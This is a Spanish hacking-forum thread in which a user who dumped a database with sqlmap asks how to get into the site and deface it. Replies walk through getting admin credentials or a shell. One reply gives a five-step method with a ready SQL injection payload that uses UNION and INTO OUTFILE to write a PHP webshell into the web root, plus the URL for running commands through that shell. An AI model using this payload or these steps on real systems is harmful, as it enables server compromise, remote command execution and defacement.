elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Sql injection y que más?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Sql injection y que más?  (Leído 3,941 veces)
4lienx

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Sql injection y que más?
« en: 25 Octubre 2019, 11:49 am »

Buenas gente del foro ElHacker, estuve haciendo test de una pagina que ando haciendo con mi hermano, yo en el apartado de hacking y el en el apartado de soluciones de bugs, estamos empezando recién con esto, he utilizado sqlmap para conseguir la base de datos, pero que sigue después? como modifico la pagina? la idea nuestra es yo no sé como lo estructuro y yo voy atacando, por las dudas repito, después de obtener los datos, que sigue? como ingreso a su web para modificar las cosas? como dejar un mensaje en el titulo("Encontre un bug de sql injection"), les agradezco la respuesta
En línea

MetaNoia

Desconectado Desconectado

Mensajes: 33



Ver Perfil WWW
Re: Sql injection y que más?
« Respuesta #1 en: 24 Noviembre 2019, 22:27 pm »

Buenas, en ese caso tienes que conseguir una shell del servidor y después acceder al directorio donde se guardan los ficheros que se van a mostrar, en Linux suele ser "/var/www/html", y modificarlos.Con sql injection puedes hacerte con una webshell para ese propósito.Te recomiendo que leas sobre esa vulnerabilidad.
Saludos
En línea

Código:
<?php
       header("Location: TheHackerWay");
ThunderCls


Desconectado Desconectado

Mensajes: 455


Coder | Reverser | Gamer


Ver Perfil WWW
Re: Sql injection y que más?
« Respuesta #2 en: 26 Noviembre 2019, 20:14 pm »

Una vez has inyectado sql y tienes acceso a la bd lo siguiente seria sacar la cuenta admin (user+pass), una vez tienes una cuenta admin en la web podras subir tu propio shell y modificar los ficheros directamente o quizas hasta modificar la web desde el panel de control (en caso que use algun cms)
En línea

-[ "…I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/
MetaNoia

Desconectado Desconectado

Mensajes: 33



Ver Perfil WWW
Re: Sql injection y que más?
« Respuesta #3 en: 26 Noviembre 2019, 22:01 pm »

No hace tener las credenciales del admin para subir tu propio shell.

El primer paso consiste en encontrar un punto de inyección desde donde introducir codigo SQL.

Después debemos comprobar si el usuario que realiza las consultas a la base de datos tiene el permiso de FILE para leer y escribir ficheros en el servidor usando sentencias "SELECT ... INTO OUTFILE".

El tercer paso consiste en encontrar en el servidor algún directorio donde tengas permisos de
escritura, normalmente se suelen buscar ficheros temporales ya que cuentas con estos privilegios.

En el cuarto paso haremos uso de SQL Injection y mediante la técnica UNION escribimos el el fichero especificado código PHP.
Código:
http://ejemplo.com/pagina.php?id=1 union select 1,1, "<?ph system($_REQUEST['terminal']); ?>" into outfile "/var/www/html/temp/miFichero.php" --
Aquí por ejemplo el punto de inyección son los parámetros que se pasan por GET pero también podría ser alguna caja de texto cuyo valor se envié a la base de datos y no este correctamente saneado.

El quinto y ultimo paso consiste en acceder a ese fichero que hemos creado mediante la url quedando algo así
Código:
http://ejemplo.com/temp/miFichero.php?terminal=comandoQueQuierasEjecutar
En línea

Código:
<?php
       header("Location: TheHackerWay");
BloodSharp


Desconectado Desconectado

Mensajes: 811


¡ Hiperfoco !


Ver Perfil WWW
Re: Sql injection y que más?
« Respuesta #4 en: 26 Noviembre 2019, 22:12 pm »

Aseguraté que la webshell que utilices, en caso de ser descargada de internet, no esté troyanizada.


B#
En línea



Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql injection
Nivel Web
TheAnswer 1 3,720 Último mensaje 11 Octubre 2004, 08:07 am
por Jec
SQL Injection
Nivel Web
Adept 4 4,541 Último mensaje 7 Diciembre 2004, 22:56 pm
por PaK0
CAST EXEC en sql injection(Automated Sql Injection)
Nivel Web
EvilGoblin 2 5,162 Último mensaje 11 Julio 2010, 22:25 pm
por EvilGoblin
Xss injection & sql injection pequeña duda.
Nivel Web
6666 6 3,826 Último mensaje 12 Septiembre 2014, 07:27 am
por 6666
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines